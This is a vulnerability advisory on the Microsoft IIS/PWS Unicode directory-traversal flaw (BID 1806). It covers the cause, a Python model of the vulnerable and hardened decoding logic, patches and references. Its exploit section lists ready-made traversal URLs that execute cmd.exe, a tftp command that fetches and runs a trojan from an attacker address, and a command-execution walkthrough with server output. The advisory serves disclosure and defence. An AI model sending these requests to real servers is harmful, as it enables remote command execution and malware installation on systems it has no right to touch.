Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
BID:1806
Info
| Bugtraq ID: | 1806 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Oct 17 2000 12:00AM |
| Updated: | Oct 17 2000 12:00AM |
| Credit: | Discovered by an anonymous poster to a Packetstorm forum. Additional research conducted by Rain Forest Puppy <[email protected]>. Publicized in a Microsoft Security Bulletin (MS00-078) on October 17, 2000. Microsoft Personal Web Server discovered and post |
| Vulnerable: | Microsoft Personal Web Server 4.0, Microsoft IIS 5.0, Microsoft IIS 4.0 alpha, Microsoft IIS 4.0 |
| Not Vulnerable: | |
Discussion
Microsoft IIS 4.0 and 5.0 are both vulnerable to "../" (dot-dot) directory traversal when the "/" or "\" in the traversal sequence is sent as an overlong ("extended") UTF-8 encoding, for example %c0%af for "/" or %c1%9c for "\". IIS checks the request for parent-directory references before it canonicalises these sequences, so the check never sees a ".." segment, and the decoded path is then used to locate the file.
Unauthenticated users can access any file whose path they know, in the security context of the IUSR_machinename account. That account is by default a member of the Everyone and Users groups, so any file on the same logical drive as a web-accessible directory that grants those groups access can be deleted, modified, or executed. A remote user with no credentials at all therefore ends up with the same privileges as a user who could log onto the system.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
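The check-before-canonicalisation failure described above, as an added Python example that is not part of this advisory and is not Microsoft's code: it models the unpatched order of operations (percent-decode, run the parent-directory check on those bytes, only then canonicalise UTF-8 with a lenient decoder that accepts C0/C1 overlong forms) beside a hardened resolver that decodes strictly first, canonicalises, and checks containment. The virtual-directory layout (/scripts mapped to /inetpub/scripts, web root /inetpub/wwwroot, POSIX paths standing in for Windows ones) and the exact leniency of the decoder (the high bits of the trailing byte are ignored, which is why %c1%1c also yields a backslash in the examples on this page) are assumptions modelled on the advisory's examples, not on IIS source.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Assumed layout for the example: one virtual directory plus the web root.
WEBROOT = "/inetpub/wwwroot"
VDIRS = {"/scripts": "/inetpub/scripts"}


def lenient_utf8_decode(data: bytes) -> str:
    """Decode bytes the way the unpatched decoder is modelled here: a lead byte
    in C0..DF followed by any byte is accepted as a two-byte sequence, and the
    high bits of the trailing byte are ignored. So C0 AF -> '/' (overlong form
    of 0x2F), C1 9C -> '\\' (overlong form of 0x5C) and C1 1C -> '\\' too.
    A conforming decoder rejects all three. Modelled on the page's examples."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")  # longer sequences are not needed here
            i += 1
    return "".join(out)


def physical_path(decoded_path: str):
    """Map a decoded URL path onto disk and normalise it.
    Returns (root the request mapped to, normalised physical path)."""
    p = decoded_path.replace("\\", "/")
    for prefix, root in VDIRS.items():
        if p == prefix or p.startswith(prefix + "/"):
            return root, posixpath.normpath(root + p[len(prefix):])
    return WEBROOT, posixpath.normpath(WEBROOT + "/" + p.lstrip("/"))


def vulnerable_iis_resolve(raw_url_path: str):
    """Unpatched order of operations: percent-decode, run the parent-directory
    check on those bytes, and only then canonicalise UTF-8 and map to disk.
    b'..\\xc0\\xaf..' is not a b'..' segment at check time, so it passes.
    Returns the path that would be opened, or None if the check rejected it."""
    percent_decoded = unquote_to_bytes(raw_url_path)
    segments = percent_decoded.replace(b"\\", b"/").split(b"/")
    if b".." in segments:
        return None
    _root, phys = physical_path(lenient_utf8_decode(percent_decoded))
    return phys


def hardened_resolve(raw_url_path: str):
    """Decode completely and strictly first (strict UTF-8 rejects C0/C1 lead
    bytes outright), then canonicalise, then check that the result is still
    inside the directory the request mapped to."""
    try:
        decoded = unquote_to_bytes(raw_url_path).decode("utf-8")
    except UnicodeDecodeError:
        return None
    root, phys = physical_path(decoded)
    if phys != root and not phys.startswith(root + "/"):
        return None
    return phys


if __name__ == "__main__":
    for url in ("/scripts/test.exe",
                "/scripts/../../winnt/system32/cmd.exe",
                "/scripts/..%2f..%2fwinnt/system32/cmd.exe",
                "/scripts/..%c0%af../winnt/system32/cmd.exe",
                "/scripts/..%c1%9c../winnt/system32/cmd.exe",
                "/scripts/..%c1%1c../winnt/system32/cmd.exe"):
        print(f"{url:46} unpatched={vulnerable_iis_resolve(url)!s:26} "
              f"hardened={hardened_resolve(url)}")
```

The plain and %2f-encoded forms are caught by the unpatched check because the percent-decoding has already happened when it runs; only the overlong forms slip past, which is exactly the set of working examples listed in the Exploit section. The hardened version makes the fix structural: nothing is inspected until the path is fully decoded and normalised, and containment is checked against the mapped root rather than looking for a ".." substring.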
Exploit / POC
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following examples were provided:
http://target/scripts/..%c1%1c../path/file.ext
Eg.
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
Zoa_Chien <[email protected]> describes the following exploits using TFTP or Samba in his post to Bugtraq:
By using tftp.exe, which comes with NT and Win2k, to connect to a tftp daemon and download a trojan, you can bypass these restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip > and connect from your compromised machine to your local machine using the command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ".
You can do so with this URL:
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
Then all you have to do is run the trojan with:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe
You might also use the Samba commands "net share" and "net user" on the target and "net use" on the local machine... but this does not always seem to work (because NetBIOS is not installed?).
In their post to Bugtraq, Nsfocus Security Team <[email protected]> describe how to execute commands using a redirect on the target host:
(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\inetpub\scripts\cmd1.exe"
http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
IIS returned:
"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:
1 file(s) copied."
(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa"
http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa
IIS returned:
" Directory of c:\inetpub\scripts
10/25/2000  03:48p      <DIR>          .
10/25/2000  03:48p      <DIR>          ..
10/25/2000  03:51p                   6 aaa
12/07/1999  05:00a             236,304 cmd1.exe
..
abc
"
Optyx <[email protected]> has released the following exploits:
iis-zang.c
iis-zang.exe
iis-zang.obsd
iis-zang.linux
Roelof Temmingh <[email protected]> has released the following exploits:
unicodecheck.pl
unicodexecute.pl
unicodexecute2.pl
<[email protected]> has released the following exploit:
iisuni.c
BoloTron <[email protected]> has provided the following exploit:
iis-kabom.php
Gabriel Maggiotti <[email protected]> has provided the following exploit:
all_uniexp.c
SPAX <[email protected]> has provided the following exploit:
IIS-PLUS.PL
Solution / Fix
Solution:
The patch released with the advisory MS00-057 (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp) eliminates this vulnerability, so those who have already applied that patch need take no further action. Otherwise, the patch is available at the following locations. Note that the Personal Web Server 4.0 entry is a third-party patch (David Raitzer), not a Microsoft release.
Microsoft Personal Web Server 4.0
- David Raitzer pws_patch.zip: http://www.geocities.com/p_w_server/pws_patch/index.htm
Microsoft IIS 4.0 alpha
- Microsoft Q269862: http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4a.exe
- Microsoft Q269862: http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4as.exe
Microsoft IIS 4.0
- Microsoft Q269862: http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4i.exe
- Microsoft Q269862: http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4is.exe
Microsoft IIS 5.0
References
References:
- F-Secure Computer Virus Information Pages: CodeBlue (F-Secure)
- Frequently Asked Questions: Microsoft Security Bulletin (MS00-078) (Microsoft)
- FW: ISSalert: ISS Alert: Code Blue Worm (VanMeter, John)
- IIS UNICODE exploit (CORE Security)
- TROJ_BLUECODE.A (Trend Micro)